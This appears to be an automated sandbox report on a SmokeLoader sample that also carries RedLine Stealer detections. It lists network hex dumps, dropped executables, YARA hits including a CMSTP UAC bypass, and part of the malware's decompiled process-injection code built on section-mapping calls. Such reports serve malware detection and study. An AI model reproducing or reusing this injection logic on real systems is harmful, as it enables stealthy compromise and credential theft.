                                                        2022-11-20 22:29:22 UTC569INData Raw: 31 66 66 38 0d 0a 96 d8 86 38 9d cd 8c 40 92 cd 8c 36 91 cb 81 37 9c c8 88 42 95 c5 88 40 95 cd 84 34 8a cb 8c 40 94 cd 8f 3c 95 ce 80 41 93 d3 84 40 99 c1 7e 34 93 d2 8a 41 a0 d0 7e 3a a0 d4 85 48 b9 c4 a0 3d ca cd 99 3e d2 c7 97 2e ba ce 9f 41 d8 a6 80 34 c5 a9 81 31 be a5 7e 40 d4 9c 7e 3a c9 a8 7f 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ab 80 30 ce a5 7e 3c c6 9f 80 38 c6 a0 7f 3c c0 a3 81 34 c2 a5 7e 34 ca 98 80 3d c5 9e 81 37 cf a1 80 36 d2 ab 7f 2f ce a0 7f 3a d1 a3 7f 3e cc a1 81 41 c2 9d 7e 3c d7 a7 80 3c c8 a9 81 3c ca 9b 80 36 d9 a9 7f 3a ca ab 80 33 cc a9 80 32 cd 96 81 3c c5 a1 7e 3c c8 ac 81 3f cc
                                                        Data Ascii: 1ff88@67B@4@<A@~4A~:H=>.A41~@~:30~<8<4~4=76/:>A~<<<6:32<~<?
                                                        2022-11-20 22:29:22 UTC577INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC577INData Raw: b3 b5 ab ce af b5 a9 ca 7e 80 7f c8 bd c7 a0 39 00 00 00 00 81 7f 7f c1 b9 c1 bc c5 c0 ca c2 c9 bb c2 b4 c3 bd ba c4 c9 c0 bb b0 c8 67 7f 7f c3 91 bb c2 c7 75 83 bf d4 63 7f 80 cd b7 b9 b0 c3 bd c2 ad bb b3 ba ae c6 7f 80 7f c9 cb 86 80 3b 00 00 00 00 7e 7e 7e c7 bc c0 b5 ce bd c1 cb cc c2 c6 b4 d0 c4 bb c0 bf be b9 c2 c4 77 7f 84 bf 82 bd cb cc 7f 9f be c0 80 8a d1 c9 6a 81 7e d0 ad b1 b2 ce ab bd b8 c1 7e 80 7f c8 c9 88 8b 3e 00 00 00 00 80 7f 7e cb c3 cd ce c5 c1 bf c0 c0 c1 c3 c2 c0 b8 c1 bb c3 c1 b8 b9 ca b7 b5 b5 cd 71 7f 80 c7 7f be c5 c5 80 a0 be c1 7f 8a b9 d0 66 81 80 ca b6 ba ae cc 80 81 80 c9 b9 c7 9d 39 00 00 00 00 7e 80 80 c4 ba ca c8 c7 cb c5 c8 c5 c0 c7 c3 cd c2 b7 bc ce bb c1 bf cd be ba b9 c9 c5 c0 ac c0 76 81 80 d0 94 b7 b3 d1 7f a4 c5
                                                        Data Ascii: ~9guc;~~~wj~~>~qf9~v
                                                        2022-11-20 22:29:22 UTC585INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC585INData Raw: 32 30 30 30 0d 0a 6c 61 2e 20 4c 6f 6b 6f 79 6f 73 75 6d 75 6d 6f 20 68 61 6a 61 63 69 6d 61 72 61 67 2e 20 42 65 76 75 68 61 20 78 6f 63 65 67 2e 20 47 65 63 69 76 20 74 65 64 75 64 61 79 20 76 65 76 20 70 65 76 69 72 65 73 20 6d 65 7a 69 68 69 62 6f 2e 20 53 75 70 75 67 75 6c 2e 20 4d 61 77 65 63 20 6a 75 72 61 6b 69 6e 69 66 20 67 61 73 6f 74 61 6a 69 20 6b 65 79 75 66 65 67 2e 20 5a 75 62 6f 20 6a 65 6b 75 6b 61 6d 65 6d 6f 78 75 6c 65 2e 20 48 61 76 75 6e 69 6d 75 64 61 20 70 75 62 65 72 65 6d 6f 72 20 67 65 63 69 74 69 63 65 73 65 79 20 68 75 6e 65 67 69 79 20 74 75 63 61 62 61 6c 69 6e 61 76 69 79 65 6b 2e 20 46 6f 68 61 67 75 62 75 6d 69 63 69 77 61 2e 20 4b 6f 62 6f 6a 65 64 20 7a 65 6c 75 70 61 77 65 64 65 79 20 79 65 66 69 6a 75 6a 61 7a 69 72
                                                        Data Ascii: 2000la. Lokoyosumumo hajacimarag. Bevuha xoceg. Geciv teduday vev pevires mezihibo. Supugul. Mawec jurakinif gasotaji keyufeg. Zubo jekukamemoxule. Havunimuda puberemor geciticesey hunegiy tucabalinaviyek. Fohagubumiciwa. Kobojed zelupawedey yefijujazir
                                                        2022-11-20 22:29:22 UTC593INData Raw: ff ff ff ff 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC593INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC593INData Raw: 32 30 30 30 0d 0a ff ff ff ff ff ff 00 00 ff ff ff f0 ff ff 00 00 ff 07 ff f7 1f ff 00 00 ff 10 ff f7 cf ff 00 00 ff 1c 1f f3 f3 ff 00 00 ff c7 03 f9 f8 ff 00 00 ff e3 9c fc fe 7f 00 00 ff f1 cf 1e ff 3f 00 00 ff f8 cf e1 78 1f 00 00 fe 00 1f fc 1f ff 00 00 ff 3f ff ff 9f ff 00 00 ff 87 ff ff ff ff 00 00 ff f0 03 ff ff ff 00 00 ff ff fc 3f ff ff 00 00 ff ff ff 1f ff ff 00 00 ff ff ff 07 ff ff 00 00 ff ff ff 93 ff ff 00 00 ff ff ff cc ff ff 00 00 ff ff ff f0 3f ff 00 00 ff f1 ff f0 8f ff 00 00 ff e0 ff f7 d7 ff 00 00 ff e0 ff f7 e9 ff 00 00 ff e0 ff fb e4 ff 00 00 ff 81 ff f1 f6 7f 00 00 ff 81 ff f4 73 7f 00 00 9f 81 ff fa 13 3f 00 00 8f 03 ff fb 07 bf 00 00 86 07 ff c5 ef bf 00 00 82 07 ff c8 e7 bf 00 00 80 0f ff e6 37 3f 00 00 80 0f ff fb 00 7f 00 00 80
                                                        Data Ascii: 2000?x???s?7?
                                                        2022-11-20 22:29:22 UTC601INData Raw: 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC601INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC601INData Raw: 31 32 34 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 1248


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:1
                                                        Start time:23:28:01
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\Desktop\file.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                        Imagebase:0x400000
                                                        File size:310272 bytes
                                                        MD5 hash:8691765A5EF6354D21BD12C83E9DF20B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low

                                                        General

                                                        Target ID:4
                                                        Start time:23:28:11
                                                        Start date:20/11/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff618f60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high

                                                        General

                                                        Target ID:5
                                                        Start time:23:28:58
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Imagebase:0x400000
                                                        File size:310272 bytes
                                                        MD5 hash:8691765A5EF6354D21BD12C83E9DF20B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.431504575.000000000052B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low

                                                        General

                                                        Target ID:8
                                                        Start time:23:29:06
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\FD31.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\FD31.exe
                                                        Imagebase:0x400000
                                                        File size:1134592 bytes
                                                        MD5 hash:823B2BD8B63CAFBEA781C59993109B99
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.444948921.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.443911469.000000000218A000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low

                                                        General

                                                        Target ID:9
                                                        Start time:23:29:10
                                                        Start date:20/11/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",Tiuqiiueaur
                                                        Imagebase:0xb00000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:10
                                                        Start time:23:29:21
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\2B26.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\2B26.exe
                                                        Imagebase:0x400000
                                                        File size:619008 bytes
                                                        MD5 hash:B30C788530FD281E8C434DA4B8214DB4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.473645142.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.475894264.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.474957989.000000000078B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low

                                                        General

                                                        Target ID:15
                                                        Start time:23:29:27
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\2B26.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\2B26.exe"
                                                        Imagebase:0x400000
                                                        File size:619008 bytes
                                                        MD5 hash:B30C788530FD281E8C434DA4B8214DB4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.494179230.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.494410368.0000000000770000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.494599306.0000000000831000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low

                                                        General

                                                        Target ID:17
                                                        Start time:23:30:01
                                                        Start date:20/11/2022
                                                        Path:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\cgjtubb
                                                        Imagebase:0x400000
                                                        File size:310272 bytes
                                                        MD5 hash:8691765A5EF6354D21BD12C83E9DF20B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:5.7%
                                                          Dynamic/Decrypted Code Coverage:69.8%
                                                          Signature Coverage:34.9%
                                                          Total number of Nodes:172
                                                          Total number of Limit Nodes:10
                                                          execution_graph 5392 409e62 5393 409f01 5392->5393 5394 409e74 _malloc 5392->5394 5394->5393 5395 409ed1 RtlAllocateHeap 5394->5395 5395->5394 5396 402b02 5398 402b0b 5396->5398 5397 402bdc 5398->5397 5400 401869 5398->5400 5401 401877 5400->5401 5402 4018a0 Sleep 5401->5402 5407 4013d8 5402->5407 5404 4018bb 5406 4018cc 5404->5406 5419 4014a8 5404->5419 5406->5397 5408 4013df 5407->5408 5409 4013b1 5408->5409 5410 401547 NtDuplicateObject 5408->5410 5409->5404 5410->5409 5411 401564 NtCreateSection 5410->5411 5412 4015e4 NtCreateSection 5411->5412 5413 40158a NtMapViewOfSection 5411->5413 5412->5409 5415 401610 5412->5415 5413->5412 5414 4015ad NtMapViewOfSection 5413->5414 5414->5412 5416 4015cb 5414->5416 5415->5409 5417 40161a NtMapViewOfSection 5415->5417 5416->5412 5417->5409 5418 401641 NtMapViewOfSection 5417->5418 5418->5409 5420 4014b7 5419->5420 5421 401547 NtDuplicateObject 5420->5421 5430 401663 5420->5430 5422 401564 NtCreateSection 5421->5422 5421->5430 5423 4015e4 NtCreateSection 5422->5423 5424 40158a NtMapViewOfSection 5422->5424 5426 401610 5423->5426 5423->5430 5424->5423 5425 4015ad NtMapViewOfSection 5424->5425 5425->5423 5427 4015cb 5425->5427 5428 40161a NtMapViewOfSection 5426->5428 5426->5430 5427->5423 5429 401641 NtMapViewOfSection 5428->5429 5428->5430 5429->5430 5430->5406 5614 4013e3 5615 4013df 5614->5615 5616 401547 NtDuplicateObject 5615->5616 5618 4013b1 5615->5618 5617 401564 NtCreateSection 5616->5617 5616->5618 5619 4015e4 NtCreateSection 5617->5619 5620 40158a NtMapViewOfSection 5617->5620 5619->5618 5622 401610 5619->5622 5620->5619 5621 4015ad NtMapViewOfSection 5620->5621 5621->5619 5623 4015cb 5621->5623 5622->5618 5624 40161a NtMapViewOfSection 5622->5624 5623->5619 5624->5618 5625 401641 NtMapViewOfSection 5624->5625 5625->5618 5548 402aa7 5550 4029c0 5548->5550 5549 402ab3 5550->5549 5551 401869 15 API calls 5550->5551 5551->5549 5480 6d0005 5485 6d092b GetPEB 5480->5485 5482 6d0030 5487 6d003c 5482->5487 5486 6d0972 5485->5486 5486->5482 5488 6d0049 5487->5488 5489 6d0e0f 2 API calls 5488->5489 5490 6d0223 5489->5490 5491 6d0d90 GetPEB 5490->5491 5492 6d0238 VirtualAlloc 5491->5492 5493 6d0265 5492->5493 5494 6d02ce VirtualProtect 5493->5494 5496 6d030b 5494->5496 5495 6d0439 VirtualFree 5499 6d04be LoadLibraryA 5495->5499 5496->5495 5498 6d08c7 5499->5498 5449 40ba69 5450 40ba7c 5449->5450 5453 40b8af 5450->5453 5452 40ba99 5454 40b8d0 5453->5454 5455 40b9e2 ___ansicp 5454->5455 5457 40b8e8 5454->5457 5459 40b976 _memset __freea ___free_lconv_num 5455->5459 5464 40e454 5455->5464 5457->5459 5460 409e62 5457->5460 5459->5452 5461 409f01 5460->5461 5462 409e74 _malloc 5460->5462 5461->5459 5462->5461 5463 409ed1 RtlAllocateHeap 5462->5463 5463->5462 5465 40e494 5464->5465 5467 40e4f6 _memset __freea ___free_lconv_num 5464->5467 5466 409e62 _malloc RtlAllocateHeap 5465->5466 5465->5467 5466->5467 5467->5459 5534 40188b 5535 40188f 5534->5535 5536 4018a0 Sleep 5535->5536 5537 4013d8 7 API calls 5536->5537 5538 4018bb 5537->5538 5539 4014a8 7 API calls 5538->5539 5540 4018cc 5538->5540 5539->5540 5500 6d0001 5501 6d0005 5500->5501 5502 6d092b GetPEB 5501->5502 5503 6d0030 5502->5503 5504 6d003c 7 API calls 5503->5504 5505 6d0038 5504->5505 5610 409f2c 5611 409f38 5610->5611 5612 409e62 _malloc RtlAllocateHeap 5611->5612 5613 409f47 6 library calls 5611->5613 5612->5613 5431 71397f 5434 7139a7 5431->5434 5435 7139b6 5434->5435 5438 714147 5435->5438 5441 714162 5438->5441 5439 71416b CreateToolhelp32Snapshot 5440 714187 Module32First 5439->5440 5439->5441 5442 714196 5440->5442 5443 7139a6 5440->5443 5441->5439 5441->5440 5445 713e06 5442->5445 5446 713e31 5445->5446 5447 713e42 VirtualAlloc 5446->5447 5448 713e7a 5446->5448 5447->5448 5506 402ace 5508 402a74 5506->5508 5507 402abf 5508->5506 5508->5507 5509 401869 15 API calls 5508->5509 5509->5507 5373 6d003c 5374 6d0049 5373->5374 5386 6d0e0f SetErrorMode SetErrorMode 5374->5386 5379 6d0265 5380 6d02ce VirtualProtect 5379->5380 5382 6d030b 5380->5382 5381 6d0439 VirtualFree 5385 6d04be LoadLibraryA 5381->5385 5382->5381 5384 6d08c7 5385->5384 5387 6d0223 5386->5387 5388 6d0d90 5387->5388 5389 6d0dad 5388->5389 5390 6d0dbb GetPEB 5389->5390 5391 6d0238 VirtualAlloc 5389->5391 5390->5391 5391->5379 5552 4014b3 5553 4014c4 5552->5553 5554 401547 NtDuplicateObject 5553->5554 5563 401663 5553->5563 5555 401564 NtCreateSection 5554->5555 5554->5563 5556 4015e4 NtCreateSection 5555->5556 5557 40158a NtMapViewOfSection 5555->5557 5559 401610 5556->5559 5556->5563 5557->5556 5558 4015ad NtMapViewOfSection 5557->5558 5558->5556 5560 4015cb 5558->5560 5561 40161a NtMapViewOfSection 5559->5561 5559->5563 5560->5556 5562 401641 NtMapViewOfSection 5561->5562 5561->5563 5562->5563 5576 40cb54 5579 40c9c8 5576->5579 5580 40c9dc 5579->5580 5585 40e782 5580->5585 5582 40e782 __forcdecpt_l RtlAllocateHeap 5584 40ca05 5582->5584 5583 40c9e8 __forcdecpt_l 5583->5582 5586 40e7a0 5585->5586 5587 40e790 5585->5587 5589 40e66d 5586->5589 5587->5583 5590 40e682 __isleadbyte_l 5589->5590 5591 40e68e 5590->5591 5593 40b86a 5590->5593 5591->5587 5594 40b87d 5593->5594 5597 40b4c5 5594->5597 5596 40b89d 5596->5591 5598 40b4e6 5597->5598 5599 40b6ff ___ansicp 5598->5599 5601 40b55b 5598->5601 5600 40e454 ___convertcp RtlAllocateHeap 5599->5600 5609 40b635 __freea ___free_lconv_num 5599->5609 5603 40b752 5600->5603 5602 409e62 _malloc RtlAllocateHeap 5601->5602 5605 40b5ba 5601->5605 5601->5609 5602->5605 5604 409e62 _malloc RtlAllocateHeap 5603->5604 5607 40b78f _memset 5603->5607 5603->5609 5604->5607 5606 409e62 _malloc RtlAllocateHeap 5605->5606 5605->5609 5606->5609 5608 40e454 ___convertcp RtlAllocateHeap 5607->5608 5607->5609 5608->5609 5609->5596

                                                          Executed Functions

                                                          Function 004013D8 Relevance: 10.8, APIs: 7, Instructions: 311COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 85 4013d8-4013de 86 4013df-401409 85->86 91 401400-401405 86->91 92 40140c call 40119e 86->92 91->92 94 401411-40142b 92->94 95 401410 94->95 96 40142d-401435 94->96 95->94 97 401437-40143f 96->97 98 4013cc 96->98 102 401441-401447 97->102 103 40145d-40146c 97->103 99 4013b1-4013c5 98->99 100 4013ce-4013d5 98->100 104 401449 102->104 105 40142c 102->105 106 40146d-401472 103->106 107 40149a-4014a5 104->107 108 40144b-401450 104->108 105->86 105->96 109 401474 106->109 110 401457 106->110 112 401452 108->112 113 4014bb-4014cd 108->113 109->106 111 401476-401478 109->111 114 401459-40145b 110->114 115 40143c-40143f 110->115 117 40147a-401482 111->117 118 4014de-4014f1 call 40119e 111->118 112->110 121 4014d2-4014d7 113->121 122 4014cf-4014d1 113->122 114->103 115->102 115->103 123 401484 117->123 125 4014f3 118->125 126 4014f6-4014fb 118->126 121->118 122->121 123->123 125->126 128 401501-401512 126->128 129 401824-40182c 126->129 133 401822 128->133 134 401518-401541 128->134 129->126 132 401831-401842 129->132 136 401845-401866 call 40119e 132->136 137 401838-40183e 132->137 133->132 134->133 144 401547-40155e NtDuplicateObject 134->144 137->136 144->133 146 401564-401588 NtCreateSection 144->146 148 4015e4-40160a NtCreateSection 146->148 149 40158a-4015ab NtMapViewOfSection 146->149 148->133 151 401610-401614 148->151 149->148 150 4015ad-4015c9 NtMapViewOfSection 149->150 150->148 152 4015cb-4015e1 150->152 151->133 153 40161a-40163b NtMapViewOfSection 151->153 152->148 153->133 154 401641-40165d NtMapViewOfSection 153->154 154->133 156 401663 call 401668 154->156
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b6a512c9d6eb5ca3050d385883f3a76be4b42a11236a0a405a38c14e89f911b
                                                          • Instruction ID: 67db8dc375151bfe257540867c3d287c712409260c0918a2d7cc4bffad82e0fd
                                                          • Opcode Fuzzy Hash: 9b6a512c9d6eb5ca3050d385883f3a76be4b42a11236a0a405a38c14e89f911b
                                                          • Instruction Fuzzy Hash: 22912472600204ABDB219FA1CC44EEF7BB8EF81B14F10467AFA12BB1F5D6759905CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014A8 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 158 4014a8-4014c4 162 4014db 158->162 163 4014cc-4014f1 call 40119e 158->163 162->163 167 4014f3 163->167 168 4014f6-4014fb 163->168 167->168 170 401501-401512 168->170 171 401824-40182c 168->171 175 401822 170->175 176 401518-401541 170->176 171->168 174 401831-401842 171->174 178 401845-401866 call 40119e 174->178 179 401838-40183e 174->179 175->174 176->175 186 401547-40155e NtDuplicateObject 176->186 179->178 186->175 188 401564-401588 NtCreateSection 186->188 190 4015e4-40160a NtCreateSection 188->190 191 40158a-4015ab NtMapViewOfSection 188->191 190->175 193 401610-401614 190->193 191->190 192 4015ad-4015c9 NtMapViewOfSection 191->192 192->190 194 4015cb-4015e1 192->194 193->175 195 40161a-40163b NtMapViewOfSection 193->195 194->190 195->175 196 401641-40165d NtMapViewOfSection 195->196 196->175 198 401663 call 401668 196->198
                                                          C-Code - Quality: 59%
                                                          			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				long* _t130;
				signed int _t137;
				int _t138;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				void* _t171;
				long _t172;
				intOrPtr _t173;
				void* _t174;
				long* _t180;
				intOrPtr* _t181;
				HANDLE* _t182;
				HANDLE* _t183;
				void* _t188;
				void* _t189;
				intOrPtr* _t192;
				void* _t193;
				intOrPtr _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				void* _t200;
				intOrPtr* _t201;
				void* _t202;
				long _t217;

				_t84 = 0x14e3;
				_push(0x37f);
				_t128 =  *_t197;
				_t198 = _t197 + 4;
				L0040119E(_t84, _t128, _t171, __eflags);
				_t127 = _a4;
				_t172 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t180 =  &_v100;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 =  &_v52;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t181 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
